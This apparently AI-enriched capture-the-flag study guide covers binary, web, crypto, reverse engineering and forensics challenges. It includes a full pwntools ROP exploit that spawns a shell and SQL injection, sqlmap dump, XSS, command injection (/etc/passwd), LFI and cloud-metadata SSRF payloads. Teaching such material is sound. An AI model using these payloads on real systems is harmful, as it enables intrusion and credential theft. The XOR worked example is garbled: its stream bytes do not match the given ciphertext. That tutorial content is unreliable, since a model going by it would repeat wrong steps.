By wikipedia auto curator•March 16, 2026•

wiki

Capture the flag (cybersecurity) (Wikipedia Lab Guide)

Cybersecurity Capture the Flag (CTF): A Technical Study Guide

1) Introduction and Scope

Cybersecurity Capture the Flag (CTF) exercises are highly structured, adversarial simulations designed to rigorously test and enhance an individual's or team's proficiency across a broad spectrum of computer security disciplines. These challenges, drawing inspiration from the traditional outdoor game, require participants to discover and extract "flags" – typically specific strings of text, cryptographic keys, or sensitive data structures – embedded within intentionally vulnerable systems, applications, network protocols, or data artifacts. CTFs serve as a cornerstone for practical skill development, providing invaluable hands-on experience in both offensive and defensive security techniques in a controlled, ethical environment.

This study guide delves into the profound technical underpinnings and intricate mechanics of CTF challenges. It moves beyond superficial overviews to explore the detailed architectural nuances, low-level exploits, and underlying principles that govern these security puzzles. The scope encompasses common CTF categories, fundamental exploitation methodologies, and the theoretical foundations necessary for dissecting complex challenges. The objective is to provide a technically dense, actionable resource for participants aiming to deepen their understanding and practical application of cybersecurity principles through CTF engagement.

2) Deep Technical Foundations

CTF challenges are fundamentally built upon a robust foundation of core computer science and cybersecurity principles. A thorough comprehension of these concepts is paramount for effectively dissecting, analyzing, and ultimately solving complex security puzzles.

2.1) Operating System Internals

A deep understanding of how operating systems manage resources and execute code is critical for many CTF categories, particularly binary exploitation and privilege escalation.

Memory Management: Concepts such as the stack, heap, data segments (.data, .bss), and their respective allocation and management mechanisms are foundational for understanding memory corruption vulnerabilities.
- Stack: A region of memory that grows downwards from a high address. It stores local variables, function arguments, return addresses, and saved base pointers (EBP/RBP). Function calls create stack frames.
- Heap: A region of memory used for dynamic memory allocation via functions like malloc, calloc, realloc, and free. Vulnerabilities here often exploit corrupted metadata (e.g., malloc chunk headers, tcache pointers) to achieve arbitrary read/write primitives.
- Example (C Stack Layout):
```
High Memory Addresses
+-------------------+
| Function Arguments|
+-------------------+
| Return Address    | <--- Target for overwrite in buffer overflow
+-------------------+
| Saved Base Pointer| (EBP/RBP)
+-------------------+
| Local Variables   |
| (e.g., buffer)    | <--- Overflow starts here
+-------------------+
Low Memory Addresses
```
- Example (C Program with Buffer Overflow):
```
#include <stdio.h>
#include <string.h>

void vulnerable_function(char* input) {
    char buffer[64];
    // strcpy is inherently unsafe as it doesn't check buffer size.
    strcpy(buffer, input); // Potential buffer overflow if input > 63 bytes
    printf("Input processed: %s\n", buffer);
}

int main(int argc, char** argv) {
    if (argc > 1) {
        vulnerable_function(argv[1]);
    } else {
        printf("Usage: %s <input>\n", argv[0]);
    }
    return 0;
}
```
  An input string exceeding 63 characters (plus null terminator) will overwrite adjacent memory on the stack, potentially corrupting the saved EBP/RBP and the return address, leading to control flow hijacking.
Process Execution and Control: Understanding program loading, execution context, system calls, and privilege levels is crucial for privilege escalation and understanding program behavior.
- System Calls: The interface between user-space applications and the operating system kernel. Key syscalls include execve (execute program), read/write (I/O), mmap (memory mapping), open (file access), socket (networking).
- Privilege Escalation: Exploiting misconfigurations or vulnerabilities (e.g., weak file permissions, vulnerable SUID binaries, kernel exploits) to gain elevated privileges, typically from a standard user to root.
- SUID/SGID Bits: Special file permissions that allow a program to execute with the privileges of the file owner (SUID) or group (SGID), even when invoked by a different user. A vulnerable SUID binary owned by root is a prime target.
  - Example (Bash): chmod u+s /usr/local/bin/my_privileged_tool sets the SUID bit for my_privileged_tool.
File Systems and Permissions: Knowledge of file ownership, standard Unix permissions (rwx), Access Control Lists (ACLs), and special file attributes is vital for forensics and privilege escalation.

2.2) Networking Fundamentals

A deep grasp of network protocols and services is essential for network-based challenges, packet analysis, and understanding client-server interactions.

TCP/IP Stack: Comprehensive understanding of the Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and Internet Control Message Protocol (ICMP), including their packet structures and state transitions.
- TCP Header Fields: Essential fields include SYN (synchronize), ACK (acknowledge), FIN (finish) flags, Sequence Numbers (SEQ), Acknowledgment Numbers (ACK), Window Size. Understanding these is key for TCP session hijacking, spoofing, and analysis.
- UDP: Connectionless, datagram-based protocol. Lacks reliability guarantees (no retransmissions, ordering). Commonly used for DNS, VoIP, and streaming.
- Packet Analysis: Proficiency with tools like Wireshark is critical for dissecting network traffic, identifying protocols, extracting data, and reverse-engineering network protocols.
Common Network Services: Familiarity with the protocols, typical ports, and common vulnerabilities of services like HTTP/S, FTP, SSH, DNS, SMB, SMTP, POP3, IMAP, and databases is crucial.
- HTTP Request/Response Structure: Understanding methods (GET, POST, PUT, DELETE), headers (Content-Type, User-Agent, Cookie, Authorization), and status codes (200, 301, 401, 403, 404, 500) is fundamental for web exploitation.
- DNS: Domain Name System resolution. Understanding record types (A, AAAA, CNAME, MX, TXT) and potential vulnerabilities like DNS tunneling for data exfiltration.

2.3) Cryptography

CTFs often involve breaking, implementing, or verifying cryptographic primitives.

Symmetric Encryption: Algorithms like AES, DES, ChaCha20 that use a single key for encryption and decryption. Understanding modes of operation is vital.
- Modes of Operation:
  - ECB (Electronic Codebook): Each block is encrypted independently. Identical plaintext blocks produce identical ciphertext blocks, revealing patterns. Highly insecure for most applications.
  - CBC (Cipher Block Chaining): Each plaintext block is XORed with the previous ciphertext block before encryption. Requires an Initialization Vector (IV) for the first block. Provides diffusion.
  - CTR (Counter Mode): Turns a block cipher into a stream cipher. Generates a keystream by encrypting a counter. Allows parallelization and random access.
- Example (Conceptual CBC Encryption):
```
Plaintext:  [BLOCK P1] [BLOCK P2] [BLOCK P3]
IV:         [      IV      ]
Ciphertext: [ENC(P1 XOR IV)] [ENC(P2 XOR ENC(P1 XOR IV))] [ENC(P3 XOR ENC(P2 XOR ENC(P1 XOR IV)))]
```
Asymmetric Encryption: Algorithms like RSA and ECC that use a pair of keys (public and private).
- RSA: Based on the difficulty of factoring large numbers. Vulnerabilities include using small public exponents (e), weak key generation, and padding oracle attacks.
- ECC (Elliptic Curve Cryptography): Offers equivalent security to RSA with smaller key sizes, making it more efficient. Attacks often target weak curve parameters or discrete logarithm problems.
Hashing: Functions like MD5, SHA-1, SHA-256, SHA-3 that produce fixed-size digests. Key properties are one-wayness and collision resistance.
- Attacks: Brute-force, rainbow tables (for password hashing), and length extension attacks (for MD5, SHA-1, and some SHA-2 variants when used improperly).
- Length Extension Attack: If H(secret || message) is known and the length of secret is known, an attacker can compute H(secret || message || padding || appended_message) without knowing secret. This is mitigated by using HMAC (Hash-based Message Authentication Code).
Encoding and Obfuscation: Techniques like Base64, Hexadecimal, URL encoding, and simple ciphers (ROT13, XOR) are often used to obscure flags or data.

2.4) Programming and Scripting Languages

Proficiency in relevant programming languages is essential for developing exploits, analyzing code, and automating tasks.

Python: The de facto standard for CTFs due to its extensive libraries for networking (socket), web requests (requests), cryptography (cryptography), and exploit development (pwntools).
C/C++: Crucial for understanding low-level vulnerabilities (buffer overflows, heap corruption, format string bugs) and for reverse engineering.
Bash/Shell Scripting: Useful for system administration tasks, automation, and understanding command-line exploits.
JavaScript: Essential for web exploitation, particularly for understanding client-side logic, DOM manipulation, and XSS vulnerabilities.

3) Internal Mechanics / Architecture Details

CTF challenges often require a deep dive into the internal workings and architectural specifics of software and hardware components.

3.1) Binary Exploitation (Pwn)

This category focuses on identifying and exploiting vulnerabilities in compiled programs, typically written in C/C++.

Memory Layout of a Process (Simplified):

+-------------------+  <- High Memory Addresses
|       Stack       |  (Local vars, return addresses, function args)
+-------------------+
|       Heap        |  (Dynamically allocated memory via malloc)
+-------------------+
|       BSS         |  (.bss: Uninitialized global/static variables)
+-------------------+
|       Data        |  (.data: Initialized global/static variables)
+-------------------+
|       Text        |  (.text: Program code, read-only)
+-------------------+  <- Low Memory Addresses

Stack-Based Buffer Overflows:
- Vulnerability: Occurs when a program writes data to a buffer on the stack without adequate bounds checking, overwriting adjacent stack data, including the return address. Functions like strcpy, gets, sprintf are common culprits.
- Exploitation: The primary goal is to overwrite the function's return address with a value that redirects execution flow to attacker-controlled code (shellcode) or to existing code snippets (ROP gadgets).
- Example (Conceptual Stack Frame Corruption):
```
[ Stack Grows Downwards ]
-------------------------
... other stack data ...
-------------------------
[ Saved RBP/EBP ]
-------------------------
[ Return Address ] <--- Target for overwrite
-------------------------
[ Function Arguments ]
-------------------------
[ Local Variables (e.g., 'buffer[64]') ] <--- Overflow occurs here
-------------------------
```
- Return-Oriented Programming (ROP): A technique used when NX (No-Execute) protection is enabled, preventing direct execution of shellcode from the stack. ROP chains together small sequences of existing instructions ("gadgets") within the program's code or loaded libraries. Each gadget typically ends with a ret instruction, allowing the chain to be executed sequentially.
  - Gadget Example: pop rdi; ret (Pops a value from the stack into the rdi register, then returns to the next instruction).
  - ROP Chain Example (for execve("/bin/sh", NULL, NULL) on x86-64 Linux):
    1. Locate the address of the string "/bin/sh" in memory.
    2. Find gadgets for pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rax; ret.
    3. Find the address of the syscall instruction.
    4. Construct the chain on the stack:
      - Address of pop rdi; ret gadget.
      - Address of "/bin/sh" string (argument for rdi).
      - Address of pop rsi; ret gadget.
      - 0 (NULL for rsi).
      - Address of pop rdx; ret gadget.
      - 0 (NULL for rdx).
      - Address of pop rax; ret gadget.
      - 59 (Syscall number for execve).
      - Address of syscall instruction.
    5. The return address on the stack is overwritten with the address of the first gadget.
Heap Exploitation: Involves exploiting vulnerabilities in dynamically allocated memory.
- Vulnerabilities: Use-after-free, double-free, heap overflow, heap metadata corruption.
- Techniques: Manipulating the internal structures of the memory allocator (e.g., glibc's dlmalloc) to achieve arbitrary write primitives. This often involves corrupting forward/backward pointers (fd/bk) in malloc chunks.
- tcache (Thread-Local Cache): A fast cache for small allocations in modern glibc. Vulnerabilities like tcache poisoning allow an attacker to overwrite the fd pointer of a freed tcache chunk to point to an arbitrary memory address, enabling overwrites of critical data structures or function pointers.
Format String Vulnerabilities:
- Vulnerability: Occurs when user-controlled input is directly used as the format string argument in functions like printf, sprintf, fprintf.
- Example: printf(user_controlled_string);
- Exploitation: Attackers can leverage format specifiers like %n (writes the number of bytes printed so far to a memory address specified by the corresponding argument on the stack) to achieve arbitrary memory writes.
  - printf("AAAA%n"); writes 4 to the address pointed to by the stack entry for %n.
  - printf("AAAA%10x%n"); writes 10 to the address.

3.2) Web Exploitation (Web)

This category focuses on vulnerabilities within web applications, servers, and APIs.

HTTP Protocol Manipulation and Injection Attacks:
- SQL Injection (SQLi): Injecting malicious SQL code into application input fields to manipulate database queries.
  - Example (Authentication Bypass): admin' OR '1'='1 in the username field.
  - Example (Data Extraction): 1' UNION SELECT username, password FROM users -- to retrieve user credentials.
- Cross-Site Scripting (XSS): Injecting malicious client-side scripts (typically JavaScript) into web pages viewed by other users.
  - Reflected XSS: The injected script is immediately returned from the web server in the response.
  - Stored XSS: The injected script is permanently stored on the target server (e.g., in a database) and served to users.
  - DOM-based XSS: The vulnerability lies in the client-side JavaScript code that manipulates the Document Object Model (DOM).
  - Example: <script>alert(document.cookie)</script>
- Command Injection: Injecting operating system commands through vulnerable application inputs that are passed to shell commands.
  - Example: 127.0.0.1; cat /etc/passwd in a ping utility input.
- File Inclusion Vulnerabilities:
  - Local File Inclusion (LFI): Including and executing local files on the server, often used to read sensitive files like /etc/passwd, configuration files, or application source code.
  - Remote File Inclusion (RFI): Including and executing files from a remote server, which can lead to arbitrary code execution.
  - Example (LFI): ?page=../../../../etc/passwd
- Server-Side Request Forgery (SSRF): Tricking the server into making unintended requests to internal or external resources. This can be used to scan internal networks, access cloud metadata endpoints, or interact with internal services.
  - Example: http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/ to access AWS EC2 instance metadata.
Web Application Architectures: Understanding the interplay between front-end (HTML, CSS, JavaScript, frameworks like React, Angular, Vue) and back-end technologies (Python/Django/Flask, Node.js/Express, PHP/Laravel, Ruby/Rails) is crucial.
- APIs (REST, GraphQL): Insecure Direct Object References (IDOR), broken access control, and injection vulnerabilities are common in API endpoints.

3.3) Cryptography (Crypto)

Challenges in this category involve breaking, analyzing, or implementing cryptographic primitives.

Classical Ciphers: Techniques like Caesar, Vigenère, substitution, and transposition ciphers. Frequency analysis is a primary tool for breaking these.
Modern Cryptography:
- Padding Oracle Attacks: Exploiting how a server handles padding errors in block ciphers (e.g., AES in CBC mode) to decrypt ciphertext or forge messages without knowing the key. The server reveals whether padding is correct or incorrect, allowing an attacker to iteratively decrypt blocks.
- RSA Attacks: Exploiting mathematical weaknesses such as small public exponents (e), weak prime generation (p, q), common modulus attacks (if the same modulus N is used with different public exponents), or factoring N.
- Elliptic Curve Attacks: Vulnerabilities can arise from weak curve parameters, small subgroup attacks, or side-channel leakage.
- Hash Collisions: Finding two distinct inputs that produce the same hash output. While difficult for strong hashes like SHA-256, it can be relevant for older hashes (MD5, SHA-1) or specific implementations.
Steganography: The art of hiding data within other non-secret data (e.g., images, audio).
- LSB (Least Significant Bit) Manipulation: Replacing the least significant bit(s) of pixel color values in an image with bits from the secret message. This causes minimal visual distortion.

3.4) Reverse Engineering (RE)

This discipline involves analyzing compiled binaries to understand their functionality, discover hidden logic, extract secrets, or identify vulnerabilities.

Disassemblers and Decompilers: Tools like IDA Pro, Ghidra, radare2, and Binary Ninja translate machine code into human-readable assembly language or pseudo-C code, facilitating analysis.
Debuggers: GDB, WinDbg, x64dbg allow for dynamic analysis by stepping through code execution, inspecting registers and memory, setting breakpoints, and modifying program state.
Assembly Language: Understanding the instruction sets of target architectures (e.g., x86, x86-64, ARM) is fundamental.
- x86-64 Registers (Commonly Used):
  - RAX: Accumulator, typically holds return values and syscall numbers.
  - RDI, RSI, RDX, RCX, R8, R9: Argument registers for function calls (System V AMD64 ABI).
  - RBP: Base Pointer, used to access local variables and arguments within a stack frame.
  - RSP: Stack Pointer, points to the top of the stack.
  - RIP: Instruction Pointer, points to the next instruction to be executed.
- Example (x86-64 Assembly Snippet for execve):
```
mov rax, 0x3b       ; Load syscall number for execve into RAX
mov rdi, 0x402000   ; Load address of "/bin/sh" string into RDI (1st arg)
xor rsi, rsi        ; Zero out RSI (2nd arg: argv, NULL)
xor rdx, rdx        ; Zero out RDX (3rd arg: envp, NULL)
syscall             ; Invoke the kernel to execute the syscall
```
Obfuscation Techniques: Attackers may employ techniques like control flow flattening, opaque predicates, anti-debugging checks, and code virtualization to hinder reverse engineering efforts.

3.5) Forensics

This category involves analyzing digital artifacts to reconstruct events, recover hidden information, or identify malicious activity.

File System Analysis: Examining file systems to recover deleted files, analyze file metadata (timestamps, permissions, ownership), and identify evidence of data manipulation. Tools like extundelete, foremost, scalpel.
Memory Forensics: Analyzing RAM dumps to extract volatile information such as running processes, network connections, loaded modules, cryptographic keys, and even plaintext passwords. Tools like Volatility Framework are essential.
Network Forensics: Analyzing packet captures (PCAP files) to reconstruct network traffic, identify malicious communications, extract transferred files, and trace network activity. Wireshark is indispensable here.
Malware Analysis: Static analysis (examining code without execution) and dynamic analysis (observing behavior in a controlled environment) of malicious software.

4) Practical Technical Examples

4.1) Binary Exploitation: Simple Stack Overflow with NX Bypass (ROP)

Challenge: A Linux executable with a stack buffer overflow vulnerability, and the NX (No-Execute) bit enabled. The goal is to execute /bin/sh.

Vulnerable Code (vuln.c):

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void greet(char* name) {
    char buffer[64];
    // Unsafe function: strcpy does not check buffer bounds.
    strcpy(buffer, name);
    printf("Hello, %s!\n", buffer);
}

int main(int argc, char** argv) {
    if (argc > 1) {
        greet(argv[1]);
    } else {
        printf("Usage: %s <name>\n", argv[0]);
    }
    return 0;
}

Compilation (for demonstration, disabling protections):
In a real CTF, protections would be enabled. For learning, we disable them:

# -fno-stack-protector: Disables stack canaries.
# -no-pie: Disables Position Independent Executable, making addresses static.
# -z execstack: Allows execution from the stack (not needed for ROP, but useful for simple shellcode).
# For ROP, we'd typically compile with -z noexecstack to simulate NX.
gcc -fno-stack-protector -no-pie -z execstack -o vuln vuln.c
# To simulate NX: gcc -fno-stack-protector -no-pie -z noexecstack -o vuln vuln.c

Let's assume we compiled with -z noexecstack to demonstrate ROP.

Exploitation Steps:

Information Gathering:
- Use checksec vuln to confirm protections (NX enabled, PIE disabled, Canary disabled).
- Use gdb ./vuln to find the offset to the return address. A common technique is to use pattern create 100 (from pwntools) or manually craft a long string of unique characters and observe the value in RIP upon crash. Let's assume the offset is 72 bytes.
- Find useful ROP gadgets. We need gadgets to load values into registers and a syscall instruction.
  - objdump -d vuln or ropper ./vuln can help find gadgets.
  - Gadgets needed: pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rax; ret, syscall.
- Locate the address of the string "/bin/sh" within the binary or its loaded libraries. If PIE is disabled, this address is static.

Crafting the Payload (Python with pwntools):

from pwn import *

# Target binary and architecture
context.binary = elf = ELF('./vuln')
# context.arch = 'amd64' # Usually auto-detected

# Target IP and Port (if remote)
# p = remote('target.example.com', 1337)
p = process('./vuln') # Local process

# --- Information gathered ---
offset_to_rip = 72 # Determined via pattern analysis
# Assume we found these addresses using GDB/objdump/ropper
pop_rdi_ret = 0x401234 # Hypothetical address of 'pop rdi; ret' gadget
pop_rsi_ret = 0x401236 # Hypothetical address of 'pop rsi; ret' gadget
pop_rdx_ret = 0x401238 # Hypothetical address of 'pop rdx; ret' gadget
pop_rax_ret = 0x40123a # Hypothetical address of 'pop rax; ret' gadget
syscall_addr = 0x40123c # Hypothetical address of 'syscall' instruction
bin_sh_addr = 0x402000 # Hypothetical address of "/bin/sh" string in .data or .rodata

# --- Constructing the ROP Chain ---
rop = ROP(elf) # pwntools ROP object can help find gadgets

# Build the chain to call execve("/bin/sh", NULL, NULL)
# Syscall number for execve on x86-64 Linux is 59.
rop.call('execve', [bin_sh_addr, 0, 0]) # pwntools simplifies this

# Alternatively, manual ROP chain construction:
payload = b""
payload += b'A' * offset_to_rip # Padding to overwrite buffer and saved RBP
payload += p64(pop_rdi_ret)     # Overwrite return address with first gadget
payload += p64(bin_sh_addr)     # Argument for RDI (path to execve)
payload += p64(pop_rsi_ret)     # Load next gadget
payload += p64(0)               # Argument for RSI (argv, NULL)
payload += p64(pop_rdx_ret)     # Load next gadget
payload += p64(0)               # Argument for RDX (envp, NULL)
payload += p64(pop_rax_ret)     # Load next gadget
payload += p64(59)              # Syscall number for execve
payload += p64(syscall_addr)    # Address of syscall instruction

# Send the payload
p.sendline(payload)

# Interact with the shell
p.interactive()

4.2) Web Exploitation: Blind SQL Injection

Challenge: A web application with a login form that does not display detailed error messages, making direct SQL injection difficult. The goal is to extract data (e.g., a flag) using blind techniques.

Vulnerable Application Logic (Conceptual):
A login form submits credentials to a backend script. The script constructs a query like:
SELECT * FROM users WHERE username = '$username' AND password = '$password';
If the query returns any rows, login is successful. If not, a generic "Invalid credentials" message is shown.

Exploitation Strategy (Boolean-based Blind SQLi):
We can infer information by observing the application's response to true/false conditions injected into the SQL query.

Payload (Username field):
Let's assume the username is admin. We want to check if the first character of the flag is 'f'.

Check if flag exists:
- Username: admin' AND 1=1 -- (Should log in)
- Username: admin' AND 1=2 -- (Should fail login)
Extract characters: We can iterate through characters and positions.
- Check if the first character of the flag is 'f':
  - Username: admin' AND SUBSTRING((SELECT flag FROM flags LIMIT 1), 1, 1) = 'f' --
  - If the login succeeds, the first character is 'f'. If it fails, try 'g', 'h', etc.
- Check if the second character of the flag is 'l':
  - Username: admin' AND SUBSTRING((SELECT flag FROM flags LIMIT 1), 2, 1) = 'l' --

This process is automated using tools like sqlmap or custom scripts.

Example sqlmap command:

sqlmap -u "http://example.com/login" --data="username=admin&password=password" --dbs # List databases
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db --tables # List tables
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db -T flags --columns # List columns in 'flags' table
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db -T flags -C flag --dump # Dump the 'flag' column

4.3) Cryptography: Analyzing a Simple XOR Encrypted File

Challenge: A file (secret.enc) contains encrypted data. Analysis suggests a repeating XOR key.

Scenario:
secret.enc content: \x1d\x0e\x0e\x01\x0b\x0c\x04\x00\x11\x01\x00\x0c\x0b\x04\x00\x01\x00\x07\x00\x00\x04\x00\x01\x00\x0c\x0b\x04\x00\x1d\x0e\x0e\x01
We suspect a repeating XOR key.

Exploitation Strategy:

Key Length Determination (using Index of Coincidence - IC):

The IC for random text is ~0.038. For English text, it's ~0.067.
We can test potential key lengths by XORing the ciphertext with itself shifted by that length. For a correct key length L, the resulting "plaintext" for each character stream C[i], C[i+L], C[i+2L], ... should exhibit characteristics of natural language (higher IC).

from collections import Counter

def calculate_ic(data):
    n = len(data)
    if n == 0: return 0.0
    counts = Counter(data)
    ic = sum(count * (count - 1) for count in counts.values()) / (n * (n - 1))
    return ic

ciphertext = b'\x1d\x0e\x0e\x01\x0b\x0c\x04\x00\x11\x01\x00\x0c\x0b\x04\x00\x01\x00\x07\x00\x00\x04\x00\x01\x00\x0c\x0b\x04\x00\x1d\x0e\x0e\x01'
max_key_len = 20 # Test up to a reasonable key length

for key_len in range(1, max_key_len + 1):
    total_ic = 0.0
    num_streams = 0
    for i in range(key_len):
        stream = ciphertext[i::key_len] # Extract bytes at position i, i+L, i+2L, ...
        if len(stream) > 1:
            total_ic += calculate_ic(stream)
            num_streams += 1
    average_ic = total_ic / num_streams if num_streams > 0 else 0.0
    print(f"Key Length: {key_len}, Average IC: {average_ic:.4f}")

# Expected output: Key length with IC closest to 0.067 is likely correct.
# For this specific ciphertext, key length 3 might show a higher IC.

Key Recovery (assuming key length 3):
Once key_len = 3 is identified, we can analyze each character stream independently.
- Stream 0: \x1d\x0b\x11\x00\x01\x0c\x1d (Bytes at indices 0, 3, 6, 9, 12, 15, 18, 21, 24, 27, 30)
- Stream 1: \x0e\x0c\x01\x0c\x00\x00\x0e (Bytes at indices 1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31)
- Stream 2: \x0e\x04\x00\x0b\x07\x04\x0e (Bytes at indices 2, 5, 8, 11, 14, 17, 20, 23, 26, 29)
For each stream, the most frequent byte is likely the plaintext character XORed with the key character. Assuming English plaintext, the most frequent character is usually 'e'.
- Let's say the most frequent byte in Stream 0 is \x1d. If this corresponds to 'e' (ASCII 101), then key_byte_0 = 0x1d ^ 101 = 0x1d ^ 0x65 = 0x78.
- By repeating this for all streams, we can deduce the key.
Python for Key Recovery (Manual Guessing or Frequency Analysis):
```
def xor_decrypt(ciphertext, key):
    key_len = len(key)
    plaintext = bytearray()
    for i in range(len(ciphertext)):
        plaintext.append(ciphertext[i] ^ key[i % key_len])
    return bytes(plaintext)

# Assume we determined key length is 3 and guessed the key is "KEY"
key = b"KEY"
```

Source

Wikipedia page: https://en.wikipedia.org/wiki/Capture_the_flag_(cybersecurity)
Wikipedia API endpoint: https://en.wikipedia.org/w/api.php
AI enriched at: 2026-03-30T20:17:00.357Z